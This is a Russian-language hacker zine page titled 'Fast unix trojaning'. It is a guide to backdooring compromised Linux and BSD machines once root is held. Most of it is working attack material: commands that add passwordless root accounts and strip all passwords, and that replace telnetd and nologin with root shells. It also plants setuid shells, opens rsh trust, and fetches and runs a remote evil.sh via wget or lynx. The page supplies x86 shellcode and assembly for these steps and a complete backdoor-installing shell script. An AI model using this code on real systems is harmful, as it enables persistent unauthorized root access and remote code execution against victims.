[ Prev Page | Goto Content | Next Page ] =/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\ -------------------------------------------------------------------------------- >>> Fast unix trojaning <<< -------------------------------------------------------------------------------- Идея в том чтобы затроянить машину с наименьшими затратами. А далее все, кому это нужно, могут перевести данные идеи в шеллкоды, etc.. Кое-что уже есть, т.к. эта тема не актуальна после выхода m00-modgzip.c. Может someday... ***> Linux <*** 1. Добавление пользователей # echo "m::0:0:666:/lib:/bin/sh" >> /etc/passwd # echo "s::968:0:3:/tmp:/bin/sh" >> /etc/passwd char shellcode[] = "\x31\xC0\x50\x68\x73\x73\x77\x64\x68\x63\x2F\x70\x61" "\x68\x2F\x2F\x65\x74\x89\xE3\x66\xB9\x01\x04\xB0\x05" "\xCD\x80\x89\xC3\x31\xC0\x50\x68\x2F\x73\x68\x0A\x68" "\x2F\x62\x69\x6E\x68\x74\x6D\x70\x3A\x68\x3A\x33\x3A" "\x2F\x68\x38\x36\x3A\x30\x68\x73\x3A\x3A\x39\x68\x2F" "\x73\x68\x0A\x68\x2F\x62\x69\x6E\x68\x6C\x69\x62\x3A" "\x68\x36\x36\x3A\x2F\x68\x3A\x30\x3A\x36\x68\x6D\x3A" "\x3A\x30\x89\xE1\xB2\x30\xB0\x04\xCD\x80\xB0\x06\xCD" "\x80\x31\xC0\x40\xCD\x80"; 2. Снятие всех паролей # cat /etc/passwd | sed -e "{ s/:x:/::/;}" > /etc/pass # mv -f /etc/pass /etc/passwd # cp /etc/password /etc/issue.net 3. Патчинг серверов # cat << _eof_ > /usr/sbin/in.telnetd > #!/bin/sh > /bin/sh -i > _eof_ # 4. Download с веба # wget some.host.org/evil.sh -q # chmod 755 evil.sh # ./evil.sh char downloadr_wget[] = "\x31\xC0\x50\x68\x2F\x75\x73\x72\x89\xE3\xB0\x0C\xCD" "\x80\x31\xC0\x50\x68\x2E\x61\x61\x61\x89\xE3\x6A\x41" "\x59\xB0\x05\xCD\x80\x31\xDB\x53\x68\x65\x78\x69\x74" "\x68\x2E\x2F\x6C\x0A\x68\x78\x20\x6C\x0A\x68\x6F\x64" "\x20\x2B\x68\x0A\x63\x68\x6D\x68\x6C\x20\x2D\x71\x68" "\x2E\x72\x75\x2f\x68\x61\x72\x6F\x64\x68\x33\x38\x2E" "\x6E\x68\x65\x74\x20\x66\x68\x68\x0A\x77\x67\x68\x69" "\x6E\x2F\x73\x68\x23\x21\x2F\x62\x89\xE1\x89\xC3\xB2" "\x34\xB0\x04\xCD\x80\xB0\x06\xCD\x80\x31\xC0\x50\x68" "\x2E\x61\x61\x61\x89\xE3\x66\xB9\xED\x01\xB0\x0F\xCD" "\x80\x31\xD2\x52\x68\x2E\x61\x61\x61\x89\xE3\x52\x53" "\x89\xE1\xB0\x0B\xCD\x80\x31\xC0\x40\xCD\x80"; # donwloadr via lynx 4 linux/x86 .globl _start _start: # chdir() = $12 xor %eax,%eax push %eax pushl $0x7273752f # "/usr" movl %esp,%ebx mov $12,%al int $0x80 # open() = $5 xor %eax,%eax push %eax pushl $0x6161612e # ".aaa" movl %esp,%ebx push $0101 pop %ecx mov $5,%al int $0x80 # write() = $4 movl %eax,%ebx xor %eax,%eax push %eax pushl $0x74697865 pushl $0x0a6c2f2e # "./l\n" pushl $0x0a6c2078 # "x l\n" pushl $0x2b20646f # "od +" pushl $0x6d68630a # "\nchm" pushl $0x6c3e2065 # "e >l" pushl $0x6372756f # "ourc" pushl $0x732d206c # "l -s" pushl $0x2f75722e # ".ru/" pushl $0x646f7261 # "arod" pushl $0x6e2e3338 # "83.n" pushl $0x6620786e # "nx f" pushl $0x796c0a68 # "h\nly" pushl $0x732f6e69 # "in/s" pushl $0x622f2123 # "#!/b" movl %esp,%ecx mov $60,%dl mov $4,%al int $0x80 # close() = $6 mov $6,%al int $0x80 # chmod() = $15 xor %eax,%eax push %eax pushl $0x6161612e movl %esp,%ebx movw $0755,%cx mov $15,%al int $0x80 # execve() = $11 xor %edx,%edx push %edx pushl $0x6161612e movl %esp,%ebx push %edx pushl %ebx movl %esp,%ecx mov $11,%al int $0x80 # exit() xor %eax,%eax incl %eax int $0x80 char downloadr_lynx[] = "\x31\xC0\x50\x68\x2F\x75\x73\x72\x89\xE3\xB0\x0C\xCD" "\x80\x31\xC0\x50\x68\x2E\x61\x61\x61\x89\xE3\x6A\x41" "\x59\xB0\x05\xCD\x80\x89\xC3\x31\xC0\x50\x68\x65\x78" "\x69\x74\x68\x2E\x2F\x6C\x0A\x68\x78\x20\x6C\x0A\x68" "\x6F\x64\x20\x2B\x68\x0A\x63\x68\x6D\x68\x65\x20\x3E" "\x6C\x68\x6F\x75\x72\x63\x68\x6C\x20\x2D\x73\x68\x2E" "\x72\x75\x2F\x68\x61\x72\x6F\x64\x68\x38\x33\x2E\x6E" "\x68\x6E\x78\x20\x66\x68\x68\x0A\x6C\x79\x68\x69\x6E" "\x2F\x73\x68\x23\x21\x2F\x62\x89\xE1\xB2\x3C\xB0\x04" "\xCD\x80\xB0\x06\xCD\x80\x31\xC0\x50\x68\x2E\x61\x61" "\x61\x89\xE3\x66\xB9\xED\x01\xB0\x0F\xCD\x80\x31\xD2" "\x52\x68\x2E\x61\x61\x61\x89\xE3\x52\x53\x89\xE1\xB0" "\x0B\xCD\x80\x31\xC0\x40\xCD\x80"; 5. Rsh rulezz # echo "+ +" > /root/.rhosts # rm -f /etc/hosts.deny # echo "ALL:ALL" > /etc/hosts.allow # echo "+ +" > /etc/hosts.equiv ***> *BSD <*** 1. Download с веба # links/lynx some.host.org/evil.sh -source > evil # chmod +x evil # ./evil # x86.s # download_via_lynx prog for freebsd x86 .globl _start _start: # chdir("/bin"); xor %eax,%eax push %eax pushl $0x6e69622f movl %esp,%ebx pushl %ebx pushl $12 push %eax int $0x80 # f=open("zyxa",O_CREAT|O_WRONLY,0755) xor %eax,%eax push %eax pushl $0x6178797a movl %esp,%ebx pushw $0x0755 pushw $0x0201 pushl %ebx pushl $5 push %eax int $0x80 # write(f, # "#!/b" "in/s" "h\nly" "nx -" "sour" "ce f" # "83.n" "arod" ".ru/" "b > " "b\nch" "mod " # "+x b" "\n./b" # ,52) movl %eax,%edx # store descriptor in %edx xor %eax,%eax push %eax pushl $0x622f2e0a pushl $0x6220782b pushl $0x20646f6d pushl $0x68630a62 pushl $0x203e2062 pushl $0x2f75722e pushl $0x646f7261 pushl $0x6e2e3338 pushl $0x66206563 pushl $0x72756f73 pushl $0x2d20786e pushl $0x796c0a68 pushl $0x732f6e69 pushl $0x622f2123 movl %esp,%ebx pushl $56 pushl %ebx pushl %edx pushl $4 push %eax int $0x80 xor %eax,%eax pushl %edx pushl $6 push %eax int $0x80 # execve("/bin/sh","/bin/sh\0zyxa\0",0) xor %eax,%eax push %eax pushl $0x68732f6e pushl $0x69622f2f movl %esp,%ebx push %eax pushl $0x6178797a movl %esp,%ecx push %eax pushl %ecx pushl %ebx movl %esp,%edx push %eax pushl %edx pushl %ebx pushl $59 push %eax int $0x80 xor %eax,%eax push $1 push %eax int $0x80 char bsd_lynx_downloadr [] = "\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\x53\x6A\x0C" "\x50\xCD\x80\x31\xC0\x50\x68\x7A\x79\x78\x61\x89\xE3" "\x66\x68\x55\x07\x66\x68\x01\x02\x53\x6A\x05\x50\xCD" "\x80\x89\xC2\x31\xC0\x50\x68\x0A\x2E\x2F\x62\x68\x2B" "\x78\x20\x62\x68\x6D\x6F\x64\x20\x68\x62\x0A\x63\x68" "\x68\x62\x20\x3E\x20\x68\x2E\x72\x75\x2F\x68\x61\x72" "\x6F\x64\x68\x38\x33\x2E\x6E\x68\x63\x65\x20\x66\x68" "\x73\x6F\x75\x72\x68\x6E\x78\x20\x2D\x68\x68\x0A\x6C" "\x79\x68\x69\x6E\x2F\x73\x68\x23\x21\x2F\x62\x89\xE3" "\x6A\x38\x53\x52\x6A\x04\x50\xCD\x80\x31\xC0\x52\x6A" "\x06\x50\xCD\x80\x31\xC0\x50\x68\x6E\x2F\x73\x68\x68" "\x2F\x2F\x62\x69\x89\xE3\x50\x68\x7A\x79\x78\x61\x89" "\xE1\x50\x51\x53\x89\xE2\x50\x52\x53\x6A\x3B\x50\xCD" "\x80\x31\xC0\x6A\x01\x50\xCD\x80"; 2. Добавление пользователей # pw useradd o -w none # cp /bin/sh /tmp/.asshole # chmod 4755 /tmp/.asshole 3. Патчинг /sbin/nologin # cat << _eof_ > /sbin/nologin > #!/bin/sh > /bin/sh -i > _eof_ # chmod 4755 /sbin/nologin # cp /etc/passwd /etc/issue.net # sorry за оффтопик, но.. # # Ну чё, эти шеллкоды мы тоже сперли с секфока? Кто-то в форуме что-то на эту # тему орал... ах да, это два долбоёба: pupok и c0d3x. # Простой пример скрипта для скачивания evil.sh 4 linux: #!/bin/sh rm -f .aaa if [ "$EUID" != "0" ] then exit fi if [ -n "`netstat -a | grep LISTEN | grep telnet`" ] then X1="telnetd" fi if [ -z "$X1" ] then if [ -n "`netstat -a | grep LISTEN | grep finger`" ] then X1="fingerd" fi fi if [ -z "$X1" ] then if [ -n "`netstat -a | grep LISTEN | grep shell`" ] then X1="rshd" fi fi if [ -z "$X1" ] then if [ -n "`netstat -a | grep LISTEN | grep login`" ] then X1="rlogind" fi fi if [ -n "$X1" ] then Xf=`find /usr/sbin /sbin -name "*$X1"` if [ -n "$Xf" ] then cat << _eof_ > $Xf #!/bin/sh /tmp/.asa _eof_ cp /bin/sh /tmp/.asa chmod 4755 /tmp/.asa exit # XXX fi fi if [ -n "`ps -aux | grep xinetd`" ] then cat << _eof_ > /etc/xinetd.d/telnet service telnet { socket_type = stream wait = no user = root server = /usr/sbin/in.telnetd disabled = no } _eof_ cat << _eof_ > /usr/sbin/in.telnetd #!/bin/sh /bin/sh _eof_ chmod 755 /usr/sbin/in.telnetd kill -9 `ps -aux | grep xinetd | awk {'print $2'}` xinetd & INET="4" fi # if we g0t inetd... if [ -z "$INET" ] then if [ -e "/etc/inetd.conf" ] then echo "telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd" >> /etc/inetd.conf cat << _eof_ > /usr/sbin/in.telnetd #!/bin/sh /bin/sh _eof_ chmod 755 /usr/sbin/in.telnetd kill -9 `ps -aux | grep inetd | awk {'print $2'}` inetd & fi fi cat /etc/passwd | sed -e "{s/:x:/::/;}" > /etc/pass mv /etc/pass /etc/passwd cat /etc/passwd /etc/issue.net rm -f l # _eof_ [ Prev Page | Goto Content | Next Page ]